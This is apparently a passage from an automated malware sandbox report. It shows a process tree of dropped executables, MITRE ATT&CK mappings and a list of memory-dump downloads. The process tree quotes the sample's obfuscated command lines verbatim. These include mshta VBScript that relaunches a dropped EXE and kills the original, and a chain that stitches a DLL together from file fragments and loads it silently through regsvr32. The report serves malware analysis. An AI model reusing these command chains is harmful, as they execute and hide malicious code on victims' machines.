    C:\Users\Admin\AppData\Local\669482dc-ed7b-46a8-a0ff-4122fbdb0502\487C.exe --Task
    3⤵
    - Executes dropped EXE
    PID:2516
- C:\Users\Admin\AppData\Local\669482dc-ed7b-46a8-a0ff-4122fbdb0502\487C.exe
  C:\Users\Admin\AppData\Local\669482dc-ed7b-46a8-a0ff-4122fbdb0502\487C.exe --Task
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:960
- - C:\Users\Admin\AppData\Local\669482dc-ed7b-46a8-a0ff-4122fbdb0502\487C.exe
    C:\Users\Admin\AppData\Local\669482dc-ed7b-46a8-a0ff-4122fbdb0502\487C.exe --Task
    3⤵
    - Executes dropped EXE
    PID:2704
- C:\Users\Admin\AppData\Roaming\duebvca
  C:\Users\Admin\AppData\Roaming\duebvca
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Checks SCSI registry key(s)
  PID:2608
- C:\Users\Admin\AppData\Roaming\irebvca
  C:\Users\Admin\AppData\Roaming\irebvca
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2640
- - C:\Users\Admin\AppData\Roaming\irebvca
    C:\Users\Admin\AppData\Roaming\irebvca
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks SCSI registry key(s)
    PID:2132
- C:\Users\Admin\AppData\Local\669482dc-ed7b-46a8-a0ff-4122fbdb0502\487C.exe
  C:\Users\Admin\AppData\Local\669482dc-ed7b-46a8-a0ff-4122fbdb0502\487C.exe --Task
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:1088
- - C:\Users\Admin\AppData\Local\669482dc-ed7b-46a8-a0ff-4122fbdb0502\487C.exe
    C:\Users\Admin\AppData\Local\669482dc-ed7b-46a8-a0ff-4122fbdb0502\487C.exe --Task
    3⤵
    - Executes dropped EXE
    PID:3020

C:\Users\Admin\AppData\Local\Temp\5F2E.exe
C:\Users\Admin\AppData\Local\Temp\5F2E.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1072
- C:\Users\Admin\AppData\Local\Temp\5F2E.exe
  C:\Users\Admin\AppData\Local\Temp\5F2E.exe
  2⤵
  - Executes dropped EXE
  PID:2900

C:\Users\Admin\AppData\Local\Temp\E32D.exe
C:\Users\Admin\AppData\Local\Temp\E32D.exe
1⤵
- Executes dropped EXE
PID:2276

C:\Users\Admin\AppData\Local\Temp\E485.exe
C:\Users\Admin\AppData\Local\Temp\E485.exe
1⤵
- Executes dropped EXE
PID:2172
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\System32\mshta.exe" VbsCripT: CLOsE ( cReATEoBJeCT ("wSCRipT.shEll"). RUN ( "cmd /C tYPE ""C:\Users\Admin\AppData\Local\Temp\E485.exe"" > 0~NM~WIL.eXe && sTaRT 0~nM~WIl.eXE /pwIz2i2S0CJRBKmE4 & if """" == """" for %D iN ( ""C:\Users\Admin\AppData\Local\Temp\E485.exe"" ) do taskkill -F /IM ""%~NXD"" " , 0 , TRUE))
  2⤵
  PID:1292
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C tYPE "C:\Users\Admin\AppData\Local\Temp\E485.exe" > 0~NM~WIL.eXe&&sTaRT 0~nM~WIl.eXE /pwIz2i2S0CJRBKmE4 & if "" =="" for %D iN ( "C:\Users\Admin\AppData\Local\Temp\E485.exe" ) do taskkill -F /IM "%~NXD"
    3⤵
    - Loads dropped DLL
    PID:2944
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill -F /IM "E485.exe"
      4⤵
      Kills process with taskkill
      PID:2368
  - - C:\Users\Admin\AppData\Local\Temp\0~NM~WIL.eXe
      0~nM~WIl.eXE /pwIz2i2S0CJRBKmE4
      4⤵
      Executes dropped EXE
      PID:840
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbsCripT: CLOsE ( cReATEoBJeCT ("wSCRipT.shEll"). RUN ( "cmd /C tYPE ""C:\Users\Admin\AppData\Local\Temp\0~NM~WIL.eXe"" > 0~NM~WIL.eXe && sTaRT 0~nM~WIl.eXE /pwIz2i2S0CJRBKmE4 & if ""/pwIz2i2S0CJRBKmE4 "" == """" for %D iN ( ""C:\Users\Admin\AppData\Local\Temp\0~NM~WIL.eXe"" ) do taskkill -F /IM ""%~NXD"" " , 0 , TRUE))
        5⤵
        
        PID:1264
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C tYPE "C:\Users\Admin\AppData\Local\Temp\0~NM~WIL.eXe" > 0~NM~WIL.eXe&&sTaRT 0~nM~WIl.eXE /pwIz2i2S0CJRBKmE4 & if "/pwIz2i2S0CJRBKmE4 " =="" for %D iN ( "C:\Users\Admin\AppData\Local\Temp\0~NM~WIL.eXe" ) do taskkill -F /IM "%~NXD"
        6⤵
        
        PID:1836
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCRiPT:CLosE ( cREATEObjECt( "WsCrIpT.ShElL" ). RUn ( "CmD /q /C EchO 90tQ%daTe%PSA> YAEF9Fv.MI & ECHo | seT /p = ""MZ"" > s1S8NN.3F & CoPY /Y /B S1S8Nn.3f + RVPZHO1.qP + 4ZlR0MZ.q_1 + 1LIRC.u + SWnWL.H +YAEF9FV.MI XN9IOnS.vc &sTART regsvr32.exe -s XN9IONS.VC /u " ,0, TRue) )
        5⤵
        
        PID:1608
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q /C EchO 90tQÚTe%PSA> YAEF9Fv.MI & ECHo | seT /p = "MZ" >s1S8NN.3F & CoPY /Y /B S1S8Nn.3f + RVPZHO1.qP + 4ZlR0MZ.q_1 +1LIRC.u +SWnWL.H +YAEF9FV.MI XN9IOnS.vc &sTART regsvr32.exe -s XN9IONS.VC /u
        6⤵
        
        PID:1932
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>s1S8NN.3F"
        7⤵
        
        PID:2672
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHo "
        7⤵
        
        PID:2980
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        regsvr32.exe -s XN9IONS.VC /u
        7⤵
        Loads dropped DLL
        Suspicious use of NtCreateThreadExHideFromDebugger
        
        PID:2536

C:\Users\Admin\AppData\Local\Temp\E725.exe
C:\Users\Admin\AppData\Local\Temp\E725.exe
1⤵
- Executes dropped EXE
PID:812

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Software Discovery

T1518

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/240-198-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/240-202-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/316-135-0x0000000000060000-0x0000000000069000-memory.dmp

Filesize
36KB

Download
memory/316-134-0x0000000000070000-0x0000000000075000-memory.dmp

Filesize
20KB

Download
memory/340-195-0x0000000001D30000-0x0000000001E4B000-memory.dmp

Filesize
1.1MB

Download
memory/540-93-0x0000000000400000-0x0000000000492000-memory.dmp

Filesize
584KB

Download
memory/540-92-0x0000000000220000-0x00000000002B1000-memory.dmp

Filesize
580KB

Download
memory/928-169-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/936-106-0x0000000000070000-0x0000000000077000-memory.dmp

Filesize
28KB

Download
memory/936-107-0x0000000000060000-0x000000000006C000-memory.dmp

Filesize
48KB

Download
memory/984-81-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/984-86-0x0000000004C90000-0x0000000004C91000-memory.dmp

Filesize
4KB

Download
memory/984-84-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/984-316-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1084-122-0x0000000000070000-0x0000000000076000-memory.dmp

Filesize
24KB

Download
memory/1084-123-0x0000000000060000-0x000000000006C000-memory.dmp

Filesize
48KB

Download
memory/1100-213-0x00000000020A0000-0x00000000020A2000-memory.dmp

Filesize
8KB

Download
memory/1100-229-0x000000001CA20000-0x000000001CD1F000-memory.dmp

Filesize
3.0MB

Download
memory/1108-64-0x0000000000220000-0x000000000022C000-memory.dmp

Filesize
48KB

Download
memory/1120-77-0x0000000000980000-0x0000000000981000-memory.dmp

Filesize
4KB

Download
memory/1120-80-0x0000000002170000-0x0000000002171000-memory.dmp

Filesize
4KB

Download
memory/1240-297-0x0000000003BA0000-0x0000000003BB6000-memory.dmp

Filesize
88KB

Download
memory/1240-298-0x0000000003D80000-0x0000000003D97000-memory.dmp

Filesize
92KB

Download
memory/1240-141-0x0000000002BE0000-0x0000000002BF6000-memory.dmp

Filesize
88KB

Download
memory/1240-65-0x0000000002AB0000-0x0000000002AC7000-memory.dmp

Filesize
92KB

Download
memory/1368-60-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1368-62-0x0000000076E11000-0x0000000076E13000-memory.dmp

Filesize
8KB

Download
memory/1376-112-0x00000000000C0000-0x00000000000CB000-memory.dmp

Filesize
44KB

Download
memory/1376-110-0x000000006D8D1000-0x000000006D8D3000-memory.dmp

Filesize
8KB

Download
memory/1376-111-0x00000000000D0000-0x00000000000D7000-memory.dmp

Filesize
28KB

Download
memory/1384-206-0x0000000002AD0000-0x00000000033F6000-memory.dmp

Filesize
9.1MB

Download
memory/1384-239-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/1384-212-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/1588-139-0x0000000000090000-0x0000000000095000-memory.dmp

Filesize
20KB

Download
memory/1588-140-0x0000000000080000-0x0000000000089000-memory.dmp

Filesize
36KB

Download
memory/1660-132-0x0000000000080000-0x0000000000089000-memory.dmp

Filesize
36KB

Download
memory/1660-131-0x0000000000090000-0x0000000000094000-memory.dmp

Filesize
16KB

Download
memory/1736-129-0x00000000001B0000-0x00000000001B9000-memory.dmp

Filesize
36KB

Download
memory/1736-130-0x0000000000400000-0x0000000000452000-memory.dmp

Filesize
328KB

Download
memory/1832-190-0x0000000000170000-0x0000000000171000-memory.dmp

Filesize
4KB

Download
memory/1832-191-0x0000000002EF0000-0x0000000002FE0000-memory.dmp

Filesize
960KB

Download
memory/1832-189-0x0000000000BF0000-0x0000000000D45000-memory.dmp

Filesize
1.3MB

Download
memory/1832-192-0x00000000030A0000-0x0000000003155000-memory.dmp

Filesize
724KB

Download
memory/1832-203-0x0000000003160000-0x000000000320E000-memory.dmp

Filesize
696KB

Download
memory/1832-204-0x0000000000AA0000-0x0000000000B3B000-memory.dmp

Filesize
620KB

Download
memory/1916-253-0x0000000004A03000-0x0000000004A04000-memory.dmp

Filesize
4KB

Download
memory/1916-249-0x00000000001B0000-0x00000000001DF000-memory.dmp

Filesize
188KB

Download
memory/1916-241-0x0000000001F30000-0x0000000001F4B000-memory.dmp

Filesize
108KB

Download
memory/1916-242-0x0000000001F50000-0x0000000001F69000-memory.dmp

Filesize
100KB

Download
memory/1916-254-0x0000000004A04000-0x0000000004A06000-memory.dmp

Filesize
8KB

Download
memory/1916-252-0x0000000004A02000-0x0000000004A03000-memory.dmp

Filesize
4KB

Download
memory/1916-251-0x0000000004A01000-0x0000000004A02000-memory.dmp

Filesize
4KB

Download
memory/1916-250-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/1920-104-0x00000000000C0000-0x000000000012B000-memory.dmp

Filesize
428KB

Download
memory/1920-102-0x000000006DBA1000-0x000000006DBA3000-memory.dmp

Filesize
8KB

Download
memory/1920-103-0x0000000000130000-0x00000000001A4000-memory.dmp

Filesize
464KB

Download
memory/1940-186-0x00000000001D0000-0x00000000001D1000-memory.dmp

Filesize
4KB

Download
memory/1952-119-0x0000000000110000-0x0000000000115000-memory.dmp

Filesize
20KB

Download
memory/1952-120-0x00000000000C0000-0x00000000000C9000-memory.dmp

Filesize
36KB

Download
memory/2032-115-0x0000000000060000-0x000000000006F000-memory.dmp

Filesize
60KB

Download
memory/2032-114-0x0000000000070000-0x0000000000079000-memory.dmp

Filesize
36KB

Download
memory/2172-269-0x0000000001D50000-0x0000000001DEE000-memory.dmp

Filesize
632KB

Download
memory/2192-309-0x0000000000F51000-0x0000000000F93000-memory.dmp

Filesize
264KB

Download
memory/2192-311-0x00000000009E1000-0x00000000009E2000-memory.dmp

Filesize
4KB

Download
memory/2192-306-0x00000000009E0000-0x00000000009E1000-memory.dmp

Filesize
4KB

Download
memory/2192-308-0x000000006AB00000-0x000000006AD71000-memory.dmp

Filesize
2.4MB

Download
memory/2192-307-0x0000000065EC0000-0x0000000067271000-memory.dmp

Filesize
19.7MB

Download
memory/2192-305-0x0000000000F50000-0x0000000000FA1000-memory.dmp

Filesize
324KB

Download
memory/2216-302-0x0000000000240000-0x0000000000241000-memory.dmp

Filesize
4KB

Download
memory/2232-259-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download
memory/2260-272-0x000000001C720000-0x000000001CA1F000-memory.dmp

Filesize
3.0MB

Download
memory/2260-264-0x0000000001FC0000-0x0000000001FC2000-memory.dmp

Filesize
8KB

Download
memory/2292-265-0x0000000002090000-0x0000000002092000-memory.dmp

Filesize
8KB

Download
memory/2292-286-0x0000000002096000-0x00000000020B5000-memory.dmp

Filesize
124KB

Download
memory/2292-287-0x000000001FAE0000-0x000000001FDDF000-memory.dmp

Filesize
3.0MB

Download
memory/2292-288-0x00000000020B5000-0x00000000020B6000-memory.dmp

Filesize
4KB

Download
memory/2292-266-0x000007FEF21B0000-0x000007FEF3246000-memory.dmp

Filesize
16.6MB

Download
memory/2428-267-0x0000000000400000-0x00000000004A1000-memory.dmp

Filesize
644KB

Download
memory/2428-271-0x0000000000400000-0x00000000004A1000-memory.dmp

Filesize
644KB

Download
memory/2556-279-0x0000000002590000-0x0000000002591000-memory.dmp

Filesize
4KB

Download
memory/2556-281-0x0000000002630000-0x0000000002631000-memory.dmp

Filesize
4KB

Download
memory/2556-278-0x0000000002590000-0x0000000002591000-memory.dmp

Filesize
4KB

Download
memory/2556-275-0x0000000002580000-0x0000000002581000-memory.dmp

Filesize
4KB

Download
memory/2556-274-0x000007FEFC4D1000-0x000007FEFC4D3000-memory.dmp

Filesize
8KB

Download
memory/2636-296-0x0000000000400000-0x0000000000452000-memory.dmp

Filesize
328KB

Download